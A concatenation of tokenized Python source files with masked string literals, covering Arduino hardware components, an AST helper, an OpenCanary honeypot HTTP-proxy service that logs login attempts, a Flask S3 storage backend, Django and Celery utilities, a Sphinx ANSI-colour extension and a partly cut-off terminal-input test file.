<s> import re <EOL> import threading <EOL> import pyfirmata <EOL> from util import EventEmitter , setInterval , debounce <EOL> class ArduinoNotSuppliedException ( Exception ) : <EOL> pass <EOL> class ServoOutOfRangeException ( Exception ) : <EOL> pass <EOL> class InvalidPercentageException ( Exception ) : <EOL> pass <EOL> class Component ( EventEmitter ) : <EOL> def __init__ ( self , board , pin ) : <EOL> if not board : <EOL> raise ArduinoNotSuppliedException <EOL> super ( Component , self ) . __init__ ( ) <EOL> self . _board = board <EOL> analog_regex = re . compile ( '<STR_LIT>' ) <EOL> match = analog_regex . match ( str ( pin ) ) <EOL> if match : <EOL> self . _pin = self . _board . analog [ int ( match . group ( <NUM_LIT:1> ) ) ] <EOL> else : <EOL> self . _pin = self . _board . digital [ int ( pin ) ] <EOL> @ property <EOL> def value ( self ) : <EOL> return self . _pin . value <EOL> class Sensor ( Component ) : <EOL> def __init__ ( self , board , pin ) : <EOL> super ( Sensor , self ) . __init__ ( board , pin ) <EOL> self . threshold = <NUM_LIT> <EOL> self . _pin . mode = pyfirmata . INPUT <EOL> self . _pin . enable_reporting ( ) <EOL> self . _old_value = self . value <EOL> self . _board . on ( '<STR_LIT:data>' , self . _handle_data ) <EOL> def _handle_data ( self ) : <EOL> value = self . value or <NUM_LIT:0> <EOL> high_value = value + self . threshold <EOL> low_value = value - self . threshold <EOL> if self . _old_value < low_value or self . _old_value > high_value : <EOL> self . _old_value = value <EOL> self . _handle_state_changed ( ) <EOL> @ debounce ( <NUM_LIT> ) <EOL> def _handle_state_changed ( self ) : <EOL> self . emit ( '<STR_LIT>' ) <EOL> def change ( self , cb ) : <EOL> self . on ( '<STR_LIT>' , cb ) <EOL> class Led ( Component ) : <EOL> def __init__ ( self , board , pin ) : <EOL> super ( Led , self ) . __init__ ( board , pin ) <EOL> self . _isOn = False <EOL> self . _interval = None <EOL> def on ( self ) : <EOL> self . _pin . write ( <NUM_LIT:1> ) <EOL> self . _isOn = True <EOL> return self <EOL> def off ( self , clear = True ) : <EOL> self . _pin . write ( <NUM_LIT:0> ) <EOL> self . _isOn = False <EOL> if self . _interval and clear : <EOL> self . _interval . clear ( ) <EOL> return self <EOL> def toggle ( self ) : <EOL> if self . _isOn : <EOL> return self . off ( clear = False ) <EOL> else : <EOL> return self . on ( ) <EOL> def blink ( self , millis ) : <EOL> if self . _interval : <EOL> self . _interval . clear ( ) <EOL> self . _interval = setInterval ( self . toggle , millis ) <EOL> def brightness ( self , value ) : <EOL> if int ( value ) > <NUM_LIT:100> or int ( value ) < <NUM_LIT:0> : <EOL> raise InvalidPercentageException <EOL> if self . _pin . mode != pyfirmata . PWM : <EOL> self . _pin . mode = pyfirmata . PWM <EOL> _new_value = value / <NUM_LIT> <EOL> if _new_value == <NUM_LIT:0> : <EOL> self . _isOn = False <EOL> else : <EOL> self . isOn = True <EOL> self . _pin . write ( _new_value ) <EOL> return self <EOL> class RGBLed ( EventEmitter ) : <EOL> def __init__ ( self , board , pins ) : <EOL> if not board : <EOL> raise ArduinoNotSuppliedException <EOL> super ( RGBLed , self ) . __init__ ( ) <EOL> self . _red = Led ( board , pins [ "<STR_LIT>" ] ) <EOL> self . _green = Led ( board , pins [ "<STR_LIT>" ] ) <EOL> self . _blue = Led ( board , pins [ "<STR_LIT>" ] ) <EOL> def off ( self ) : <EOL> self . _red . off ( ) <EOL> self . _green . off ( ) <EOL> self . _blue . off ( ) <EOL> return self <EOL> def red ( self ) : <EOL> self . _red . on ( ) <EOL> self . _green . off ( ) <EOL> self . _blue . off ( ) <EOL> return self <EOL> def green ( self ) : <EOL> self . _red . off ( ) <EOL> self . _green . on ( ) <EOL> self . _blue . off ( ) <EOL> return self <EOL> def blue ( self ) : <EOL> self . _red . off ( ) <EOL> self . _green . off ( ) <EOL> self . _blue . on ( ) <EOL> return self <EOL> def yellow ( self ) : <EOL> self . _red . on ( ) <EOL> self . _green . on ( ) <EOL> self . _blue . off ( ) <EOL> return self <EOL> def cyan ( self ) : <EOL> self . _red . off ( ) <EOL> self . _green . on ( ) <EOL> self . _blue . on ( ) <EOL> return self <EOL> def purple ( self ) : <EOL> self . _red . on ( ) <EOL> self . _green . off ( ) <EOL> self . _blue . on ( ) <EOL> return self <EOL> def white ( self ) : <EOL> self . _red . on ( ) <EOL> self . _green . on ( ) <EOL> self . _blue . on ( ) <EOL> return self <EOL> class Buzzer ( Led ) : <EOL> pass <EOL> class Button ( Sensor ) : <EOL> def __init__ ( self , board , pin ) : <EOL> super ( Button , self ) . __init__ ( board , pin ) <EOL> self . _old_value = False <EOL> self . _timeout = None <EOL> self . change ( self . _emit_button_events ) <EOL> def _handle_data ( self ) : <EOL> value = self . value <EOL> if self . _old_value != value : <EOL> self . _old_value = value <EOL> self . _handle_state_changed ( ) <EOL> def _emit_button_events ( self ) : <EOL> if self . value is False : <EOL> if ( self . _timeout ) : <EOL> self . _timeout . cancel ( ) <EOL> self . emit ( '<STR_LIT>' ) <EOL> elif self . value : <EOL> def emit_hold ( ) : <EOL> self . emit ( '<STR_LIT>' ) <EOL> self . _timeout = threading . Timer ( <NUM_LIT:1> , emit_hold ) <EOL> self . _timeout . start ( ) <EOL> self . emit ( '<STR_LIT>' ) <EOL> def down ( self , cb ) : <EOL> self . on ( '<STR_LIT>' , cb ) <EOL> def up ( self , cb ) : <EOL> self . on ( '<STR_LIT>' , cb ) <EOL> def hold ( self , cb ) : <EOL> self . on ( '<STR_LIT>' , cb ) <EOL> class Servo ( Component ) : <EOL> def __init__ ( self , board , pin ) : <EOL> super ( Servo , self ) . __init__ ( board , pin ) <EOL> self . _pin . mode = pyfirmata . SERVO <EOL> def set_position ( self , degrees ) : <EOL> if int ( degrees ) > <NUM_LIT> or int ( degrees ) < <NUM_LIT:0> : <EOL> raise ServoOutOfRangeException <EOL> self . _pin . write ( degrees ) <EOL> def move ( self , degrees ) : <EOL> self . set_position ( self . value + int ( degrees ) ) <EOL> def center ( self ) : <EOL> self . set_position ( <NUM_LIT> ) <EOL> def reset ( self ) : <EOL> self . set_position ( <NUM_LIT:0> ) <EOL> class Motor ( Component ) : <EOL> def __init__ ( self , board , pin ) : <EOL> super ( Motor , self ) . __init__ ( board , pin ) <EOL> self . _speed = <NUM_LIT:0> <EOL> self . _pin . mode = pyfirmata . PWM <EOL> def start ( self , speed = <NUM_LIT:50> ) : <EOL> self . speed = speed <EOL> def stop ( self ) : <EOL> self . speed = <NUM_LIT:0> <EOL> @ property <EOL> def speed ( self ) : <EOL> return self . _speed <EOL> @ speed . setter <EOL> def speed ( self , speed ) : <EOL> if int ( speed ) > <NUM_LIT:100> or int ( speed ) < <NUM_LIT:0> : <EOL> raise InvalidPercentageException <EOL> self . _speed = speed <EOL> self . _pin . write ( speed / <NUM_LIT> ) <EOL> self . emit ( '<STR_LIT>' , speed ) </s>
<s> from pdb import set_trace as br <EOL> class ASTBuilder : <EOL> def ast ( self , begin , ast ) : <EOL> end = self . parser . input . position <EOL> full = '<STR_LIT>' . join ( self . parser . input . data ) <EOL> text = full [ begin : end ] <EOL> start_line = full [ : begin ] . count ( "<STR_LIT:\n>" ) + self . line_offset <EOL> start_col = begin - full . rfind ( "<STR_LIT:\n>" , <NUM_LIT:0> , begin ) - <NUM_LIT:1> <EOL> end_line = start_line + text . count ( "<STR_LIT:\n>" ) <EOL> inside_nl = text . rfind ( "<STR_LIT:\n>" , <NUM_LIT:0> ) <EOL> if inside_nl == - <NUM_LIT:1> : <EOL> end_col = start_col + len ( text ) <EOL> else : <EOL> end_col = len ( text [ inside_nl : ] ) <EOL> node = ASTNode ( ast , text , start_line , start_col , end_line , end_col ) <EOL> return node <EOL> def sint_ast ( self , last_begin , ast ) : <EOL> end = self . parser . input . position <EOL> full = '<STR_LIT>' . join ( self . parser . input . data ) <EOL> text = full [ last_begin : end ] <EOL> line = full [ : last_begin ] . count ( "<STR_LIT:\n>" ) + self . line_offset + <NUM_LIT:2> <EOL> node = ASTNode ( ast , text , line , <NUM_LIT:0> , line , <NUM_LIT:0> ) <EOL> return node <EOL> class ASTNode ( ) : <EOL> def __init__ ( self , lst , text , start_line , start_col , end_line , end_col ) : <EOL> self . lst = lst <EOL> self . text = text <EOL> self . start_line = start_line <EOL> self . start_col = start_col <EOL> self . end_line = end_line <EOL> self . end_col = end_col <EOL> def __len__ ( self ) : <EOL> return len ( self . lst ) <EOL> def __getitem__ ( self , key ) : <EOL> return self . lst [ key ] <EOL> def __setitem__ ( self , key , val ) : <EOL> self . lst [ key ] = val <EOL> def __delitem__ ( self , key ) : <EOL> del self . lst [ key ] <EOL> def __iter__ ( self ) : <EOL> return self . lst . __iter__ ( ) <EOL> def __reversed__ ( self ) : <EOL> return self . lst . __reversed__ ( ) <EOL> def __contains__ ( self , item ) : <EOL> return item in self . lst <EOL> def __coerce__ ( self , other ) : <EOL> if hasattr ( other , '<STR_LIT>' ) : <EOL> return ( self , other ) <EOL> return None <EOL> def __add__ ( self , other ) : <EOL> return self . lst + other <EOL> def __radd__ ( self , other ) : <EOL> return other + self . lst <EOL> def __str__ ( self ) : <EOL> return self . lst . __str__ ( ) <EOL> def __iter__ ( self ) : <EOL> return self . lst . __iter__ ( ) <EOL> def __repr__ ( self ) : <EOL> return self . lst . __repr__ ( ) <EOL> def __eq__ ( self , other ) : <EOL> return id ( other ) == id ( self ) or id ( other ) == id ( self . lst ) or other == self . lst <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __getslice__ ( self , i , j ) : <EOL> return self . lst . __getslice__ ( i , j ) <EOL> def __getattr__ ( self , name ) : <EOL> return self . __dict__ [ name ] <EOL> def __setattr__ ( self , name , val ) : <EOL> self . __dict__ [ name ] = val </s>
<s> import os <EOL> import datetime <EOL> from opencanary . modules import CanaryService <EOL> from base64 import b64decode <EOL> import urlparse <EOL> from urllib import quote as urlquote <EOL> from twisted . application import internet <EOL> from twisted . internet . protocol import ServerFactory <EOL> from twisted . application . internet import TCPServer <EOL> from twisted . internet . protocol import ClientFactory <EOL> from twisted . internet import protocol <EOL> from twisted . web . http import HTTPClient , Request , HTTPChannel <EOL> from twisted . web import http <EOL> from twisted . internet import reactor <EOL> from jinja2 import Template <EOL> PROFILES = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT:1.0>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> ] , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> class AlertProxyRequest ( Request ) : <EOL> """<STR_LIT>""" <EOL> FACTORY = None <EOL> def __init__ ( self , channel , queued ) : <EOL> Request . __init__ ( self , channel , queued ) <EOL> def logAuth ( self ) : <EOL> auth = self . getHeader ( "<STR_LIT>" ) <EOL> if auth is None : <EOL> return <EOL> factory = AlertProxyRequest . FACTORY <EOL> username , password = "<STR_LIT>" , "<STR_LIT>" <EOL> atype , token = auth . split ( "<STR_LIT:U+0020>" ) <EOL> if atype == "<STR_LIT>" : <EOL> try : <EOL> username , password = b64decode ( token ) . split ( "<STR_LIT::>" ) <EOL> except : <EOL> pass <EOL> elif atype == "<STR_LIT>" : <EOL> print b64decode ( token ) . split ( "<STR_LIT::>" ) <EOL> exit ( <NUM_LIT:1> ) <EOL> print "<STR_LIT>" <EOL> return <EOL> logdata = { '<STR_LIT>' : username , '<STR_LIT>' : password } <EOL> factory . log ( logdata , transport = self . transport ) <EOL> def process ( self ) : <EOL> self . logAuth ( ) <EOL> factory = AlertProxyRequest . FACTORY <EOL> profile = PROFILES [ factory . skin ] <EOL> content = factory . auth_template . render ( <EOL> url = self . uri , <EOL> date = datetime . datetime . utcnow ( ) . strftime ( "<STR_LIT>" ) , <EOL> clientip = self . transport . getPeer ( ) . host <EOL> ) <EOL> if factory . banner : <EOL> prompt = factory . banner <EOL> else : <EOL> prompt = profile . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if profile . get ( "<STR_LIT>" , False ) : <EOL> self . clientproto = "<STR_LIT>" <EOL> self . setResponseCode ( <NUM_LIT> , profile [ "<STR_LIT>" ] ) <EOL> for ( name , value ) in profile [ "<STR_LIT>" ] : <EOL> self . responseHeaders . addRawHeader ( name , value ) <EOL> self . responseHeaders . addRawHeader ( "<STR_LIT:Content-Type>" , "<STR_LIT>" ) <EOL> self . responseHeaders . addRawHeader ( "<STR_LIT>" , <EOL> '<STR_LIT>' % prompt ) <EOL> self . responseHeaders . addRawHeader ( "<STR_LIT>" , len ( content ) ) <EOL> self . write ( content . encode ( "<STR_LIT:utf-8>" ) ) <EOL> self . finish ( ) <EOL> class AlertProxy ( HTTPChannel ) : <EOL> requestFactory = AlertProxyRequest <EOL> class HTTPProxyFactory ( http . HTTPFactory ) : <EOL> def buildProtocol ( self , addr ) : <EOL> return AlertProxy ( ) <EOL> class HTTPProxy ( CanaryService ) : <EOL> NAME = '<STR_LIT>' <EOL> def __init__ ( self , config = None , logger = None ) : <EOL> CanaryService . __init__ ( self , config = config , logger = logger ) <EOL> self . port = int ( config . getVal ( '<STR_LIT>' , default = <NUM_LIT> ) ) <EOL> self . banner = config . getVal ( '<STR_LIT>' , '<STR_LIT>' ) . encode ( '<STR_LIT:utf8>' ) <EOL> self . skin = config . getVal ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> self . skindir = os . path . join ( <EOL> HTTPProxy . resource_dir ( ) , '<STR_LIT>' , self . skin ) <EOL> self . logtype = logger . LOG_HTTPPROXY_LOGIN_ATTEMPT <EOL> self . listen_addr = config . getVal ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> authfilename = os . path . join ( self . skindir , '<STR_LIT>' ) <EOL> try : <EOL> with open ( authfilename , '<STR_LIT:r>' ) as f : <EOL> self . auth_template = Template ( f . read ( ) ) <EOL> except : <EOL> self . auth_template = Template ( "<STR_LIT>" ) <EOL> def getService ( self ) : <EOL> AlertProxyRequest . FACTORY = self <EOL> f = HTTPProxyFactory ( ) <EOL> return internet . TCPServer ( self . port , f , interface = self . listen_addr ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import boto <EOL> BOTO_INSTALLED = True <EOL> except ImportError : <EOL> BOTO_INSTALLED = False <EOL> try : <EOL> import gevent . monkey <EOL> gevent . monkey . patch_all ( ) <EOL> GEVENT_INSTALLED = True <EOL> except ImportError : <EOL> GEVENT_INSTALLED = False <EOL> import io <EOL> import mimetypes <EOL> import os <EOL> from flask import copy_current_request_context , current_app <EOL> from flask_store . exceptions import NotConfiguredError <EOL> from flask_store . providers import Provider <EOL> from flask_store . providers . temp import TemporaryStore <EOL> from werkzeug . datastructures import FileStorage <EOL> class S3Provider ( Provider ) : <EOL> """<STR_LIT>""" <EOL> REQUIRED_CONFIGURATION = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> @ staticmethod <EOL> def app_defaults ( app ) : <EOL> """<STR_LIT>""" <EOL> app . config . setdefault ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> app . config . setdefault ( '<STR_LIT>' , app . config [ '<STR_LIT>' ] ) <EOL> app . config . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not BOTO_INSTALLED : <EOL> raise ImportError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def connect ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> s3connection = boto . s3 . connect_to_region ( <EOL> current_app . config [ '<STR_LIT>' ] , <EOL> aws_access_key_id = current_app . config [ '<STR_LIT>' ] , <EOL> aws_secret_access_key = current_app . config [ '<STR_LIT>' ] ) <EOL> setattr ( self , '<STR_LIT>' , s3connection ) <EOL> return getattr ( self , '<STR_LIT>' ) <EOL> def bucket ( self , s3connection ) : <EOL> """<STR_LIT>""" <EOL> return s3connection . get_bucket ( <EOL> current_app . config . get ( '<STR_LIT>' ) ) <EOL> def join ( self , * parts ) : <EOL> """<STR_LIT>""" <EOL> return self . url_join ( * parts ) <EOL> def exists ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> s3connection = self . connect ( ) <EOL> bucket = self . bucket ( s3connection ) <EOL> path = self . join ( self . store_path , filename ) <EOL> key = boto . s3 . key . Key ( name = path , bucket = bucket ) <EOL> return key . exists ( ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = self . fp <EOL> s3connection = self . connect ( ) <EOL> bucket = self . bucket ( s3connection ) <EOL> filename = self . safe_filename ( self . filename ) <EOL> path = self . join ( self . store_path , filename ) <EOL> mimetype , encoding = mimetypes . guess_type ( filename ) <EOL> fp . seek ( <NUM_LIT:0> ) <EOL> key = bucket . new_key ( path ) <EOL> key . set_metadata ( '<STR_LIT:Content-Type>' , mimetype ) <EOL> key . set_contents_from_file ( fp ) <EOL> key . set_acl ( current_app . config . get ( '<STR_LIT>' ) ) <EOL> self . filename = filename <EOL> def open ( self ) : <EOL> """<STR_LIT>""" <EOL> s3connection = self . connect ( ) <EOL> bucket = self . bucket ( s3connection ) <EOL> key = bucket . get_key ( self . relative_path ) <EOL> if not key : <EOL> raise IOError ( '<STR_LIT>' . format ( self . relative_path ) ) <EOL> return io . BytesIO ( key . read ( ) ) <EOL> class S3GeventProvider ( S3Provider ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT:U+0020>""" <EOL> if not GEVENT_INSTALLED : <EOL> raise NotConfiguredError ( <EOL> '<STR_LIT>' ) <EOL> super ( S3GeventProvider , self ) . __init__ ( * args , ** kwargs ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = self . fp <EOL> temp = TemporaryStore ( fp ) <EOL> path = temp . save ( ) <EOL> filename = self . safe_filename ( fp . filename ) <EOL> @ copy_current_request_context <EOL> def _save ( ) : <EOL> self . fp = FileStorage ( <EOL> stream = open ( path , '<STR_LIT:rb>' ) , <EOL> filename = filename , <EOL> name = fp . name , <EOL> content_type = fp . content_type , <EOL> content_length = fp . content_length , <EOL> headers = fp . headers ) <EOL> super ( S3GeventProvider , self ) . save ( ) <EOL> os . unlink ( path ) <EOL> gevent . spawn ( _save ) <EOL> self . filename = filename </s>
<s> """<STR_LIT>""" <EOL> from flask_velox . mixins . sqla . delete import ( <EOL> DeleteObjectMixin , <EOL> MultiDeleteObjectMixin ) <EOL> class DeleteObjectView ( DeleteObjectMixin ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class MultiDeleteObjectView ( MultiDeleteObjectMixin ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from flask_via . examples . small import views <EOL> from flask . ext . via . routers import default , Include <EOL> routes = [ <EOL> default . Functional ( '<STR_LIT:/>' , views . home ) , <EOL> default . Functional ( '<STR_LIT>' , views . about ) , <EOL> default . Functional ( '<STR_LIT>' , views . contact ) , <EOL> Include ( '<STR_LIT>' , url_prefix = '<STR_LIT>' ) <EOL> ] </s>
<s> from django . views import generic <EOL> from . import settings <EOL> from . helpers import get_url_redirect <EOL> class LoginRedirectView ( generic . RedirectView ) : <EOL> permanent = False <EOL> def get_redirect_url ( self , ** kwargs ) : <EOL> return get_url_redirect ( self . request ) or settings . DEFAULT_REDIRECT_URL </s>
<s> from __future__ import unicode_literals <EOL> from django . core . paginator import Paginator <EOL> from celery . task import task <EOL> from sequere . utils import get_setting <EOL> @ task ( name = '<STR_LIT>' ) <EOL> def dispatch_action ( action_uid , dispatch = True ) : <EOL> from sequere . models import get_followers <EOL> from sequere . contrib . timeline import app <EOL> from . import Timeline <EOL> logger = dispatch_action . get_logger ( ) <EOL> action = app . backend . get_action ( action_uid ) <EOL> paginator = Paginator ( get_followers ( action . actor ) , <EOL> get_setting ( '<STR_LIT>' ) ) <EOL> logger . info ( '<STR_LIT>' % ( action , paginator . count ) ) <EOL> for num_page in paginator . page_range : <EOL> page = paginator . page ( num_page ) <EOL> for obj , timestamp in page . object_list : <EOL> if action . actor == obj : <EOL> continue <EOL> timeline = Timeline ( obj ) <EOL> timeline . save ( action , dispatch = dispatch ) <EOL> def populate_actions ( from_uid , to_uid , method , logger = None ) : <EOL> from sequere import app <EOL> from . import Timeline <EOL> from_instance = app . backend . get_from_uid ( from_uid ) <EOL> to_instance = app . backend . get_from_uid ( to_uid ) <EOL> paginator = Paginator ( Timeline ( from_instance ) . get_public ( ) , <EOL> get_setting ( '<STR_LIT>' ) ) <EOL> timeline = Timeline ( to_instance ) <EOL> if logger : <EOL> logger . info ( '<STR_LIT>' % ( method , <EOL> to_instance , <EOL> paginator . count , <EOL> from_instance ) ) <EOL> for num_page in paginator . page_range : <EOL> page = paginator . page ( num_page ) <EOL> for action in page . object_list : <EOL> getattr ( timeline , method ) ( action , dispatch = False ) <EOL> @ task ( name = '<STR_LIT>' ) <EOL> def import_actions ( from_uid , to_uid ) : <EOL> populate_actions ( from_uid , to_uid , '<STR_LIT>' , <EOL> logger = import_actions . get_logger ( ) ) <EOL> @ task ( name = '<STR_LIT>' ) <EOL> def remove_actions ( from_uid , to_uid ) : <EOL> populate_actions ( from_uid , to_uid , '<STR_LIT>' , <EOL> logger = remove_actions . get_logger ( ) ) </s>
<s> __version__ = '<STR_LIT>' <EOL> __version_info__ = ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> class SASLError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class SASLProtocolException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class QOP ( object ) : <EOL> AUTH = b'<STR_LIT>' <EOL> AUTH_INT = b'<STR_LIT>' <EOL> AUTH_CONF = b'<STR_LIT>' <EOL> all = ( AUTH , AUTH_INT , AUTH_CONF ) <EOL> bit_map = { <NUM_LIT:1> : AUTH , <NUM_LIT:2> : AUTH_INT , <NUM_LIT:4> : AUTH_CONF } <EOL> name_map = dict ( ( bit , name ) for name , bit in bit_map . items ( ) ) <EOL> @ classmethod <EOL> def names_from_bitmask ( cls , byt ) : <EOL> return set ( name for bit , name in cls . bit_map . items ( ) if bit & byt ) <EOL> @ classmethod <EOL> def flag_from_name ( cls , name ) : <EOL> return cls . name_map [ name ] </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from os import path <EOL> from docutils import nodes <EOL> from docutils . parsers import rst <EOL> from docutils . parsers . rst . directives import flag <EOL> from sphinx . util . osutil import copyfile <EOL> from sphinx . util . console import bold <EOL> class ansi_literal_block ( nodes . literal_block ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> COLOR_PATTERN = re . compile ( '<STR_LIT>' ) <EOL> CODE_CLASS_MAP = { <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:30> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT:32> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> class ANSIColorParser ( object ) : <EOL> """<STR_LIT>""" <EOL> def _finalize_pending_nodes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . new_nodes . extend ( self . pending_nodes ) <EOL> self . pending_nodes = [ ] <EOL> def _add_text ( self , text ) : <EOL> """<STR_LIT>""" <EOL> if text : <EOL> if self . pending_nodes : <EOL> self . pending_nodes [ - <NUM_LIT:1> ] . append ( nodes . Text ( text ) ) <EOL> else : <EOL> self . new_nodes . append ( nodes . Text ( text ) ) <EOL> def _colorize_block_contents ( self , block ) : <EOL> raw = block . rawsource <EOL> literal_node = nodes . literal_block ( ) <EOL> literal_node [ '<STR_LIT>' ] . append ( '<STR_LIT>' ) <EOL> block . replace_self ( literal_node ) <EOL> self . pending_nodes = [ ] <EOL> self . new_nodes = [ ] <EOL> last_end = <NUM_LIT:0> <EOL> for match in COLOR_PATTERN . finditer ( raw ) : <EOL> head = raw [ last_end : match . start ( ) ] <EOL> self . _add_text ( head ) <EOL> last_end = match . end ( ) <EOL> codes = [ int ( c ) for c in match . group ( <NUM_LIT:1> ) . split ( '<STR_LIT:;>' ) ] <EOL> if codes [ - <NUM_LIT:1> ] == <NUM_LIT:0> : <EOL> self . _finalize_pending_nodes ( ) <EOL> else : <EOL> code_node = nodes . inline ( ) <EOL> self . pending_nodes . append ( code_node ) <EOL> for code in codes : <EOL> code_node [ '<STR_LIT>' ] . append ( <EOL> '<STR_LIT>' % CODE_CLASS_MAP [ code ] ) <EOL> tail = raw [ last_end : ] <EOL> self . _add_text ( tail ) <EOL> self . _finalize_pending_nodes ( ) <EOL> literal_node . extend ( self . new_nodes ) <EOL> def _strip_color_from_block_content ( self , block ) : <EOL> content = COLOR_PATTERN . sub ( '<STR_LIT>' , block . rawsource ) <EOL> literal_node = nodes . literal_block ( content , content ) <EOL> block . replace_self ( literal_node ) <EOL> def __call__ ( self , app , doctree , docname ) : <EOL> """<STR_LIT>""" <EOL> handler = self . _colorize_block_contents <EOL> if app . builder . name != '<STR_LIT:html>' : <EOL> handler = self . _strip_color_from_block_content <EOL> for ansi_block in doctree . traverse ( ansi_literal_block ) : <EOL> handler ( ansi_block ) <EOL> def add_stylesheet ( app ) : <EOL> if app . config . html_ansi_stylesheet : <EOL> app . add_stylesheet ( '<STR_LIT>' ) <EOL> def copy_stylesheet ( app , exception ) : <EOL> if app . builder . name != '<STR_LIT:html>' or exception : <EOL> return <EOL> stylesheet = app . config . html_ansi_stylesheet <EOL> if stylesheet : <EOL> app . info ( bold ( '<STR_LIT>' ) , nonl = True ) <EOL> dest = path . join ( app . builder . outdir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> source = path . abspath ( path . dirname ( __file__ ) ) <EOL> copyfile ( path . join ( source , stylesheet ) , dest ) <EOL> app . info ( '<STR_LIT>' ) <EOL> class ANSIBlockDirective ( rst . Directive ) : <EOL> """<STR_LIT>""" <EOL> has_content = True <EOL> option_spec = dict ( string_escape = flag ) <EOL> def run ( self ) : <EOL> text = '<STR_LIT:\n>' . join ( self . content ) <EOL> if '<STR_LIT>' in self . options : <EOL> text = text . decode ( '<STR_LIT>' ) <EOL> return [ ansi_literal_block ( text , text ) ] <EOL> def setup ( app ) : <EOL> app . require_sphinx ( '<STR_LIT:1.0>' ) <EOL> app . add_config_value ( '<STR_LIT>' , None , '<STR_LIT>' ) <EOL> app . add_directive ( '<STR_LIT>' , ANSIBlockDirective ) <EOL> app . connect ( '<STR_LIT>' , add_stylesheet ) <EOL> app . connect ( '<STR_LIT>' , copy_stylesheet ) <EOL> app . connect ( '<STR_LIT>' , ANSIColorParser ( ) ) </s>
<s> import os <EOL> import signal <EOL> import sys <EOL> import threading <EOL> import time <EOL> import unittest <EOL> from mock import Mock <EOL> try : <EOL> from unittest import skip , skipUnless <EOL> except ImportError : <EOL> def skip ( f ) : <EOL> return lambda self : None <EOL> def skipUnless ( condition , reason ) : <EOL> if condition : <EOL> return lambda x : x <EOL> else : <EOL> return lambda x : None <EOL> from curtsies import events <EOL> from curtsies . input import Input <EOL> class CustomEvent ( events . Event ) : <EOL> pass <EOL> class CustomScheduledEvent ( events . ScheduledEvent ) : <EOL> pass <EOL> @ skipUnless ( sys . stdin . isatty ( ) , "<STR_LIT>" ) <EOL> class TestInput ( unittest . TestCase ) : <EOL> def test_create ( self ) : <EOL> Input ( ) <EOL> def test_iter ( self ) : <EOL> inp = Input ( ) <EOL> inp . send = Mock ( ) <EOL> inp . send . return_value = None <EOL> for i , e in zip ( range ( <NUM_LIT:3> ) , inp ) : <EOL> self . assertEqual ( e , None ) <EOL> self . assertEqual ( inp . send . call_count , <NUM_LIT:3> ) <EOL> def test_send ( self ) : <EOL> inp = Input ( ) <EOL> inp . unprocessed_bytes = [ b'<STR_LIT:a>' ] <EOL> self . assertEqual ( inp . send ( '<STR_LIT>' ) , u'<STR_LIT:a>' ) <EOL> def test_send_nonblocking_no_event ( self ) : <EOL> inp = Input ( ) <EOL> inp . unprocessed_bytes = [ ] <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> def test_nonblocking_read ( self ) : <EOL> inp = Input ( ) <EOL> self . assertEqual ( inp . _nonblocking_read ( ) , <NUM_LIT:0> ) <EOL> def test_send_paste ( self ) : <EOL> inp = Input 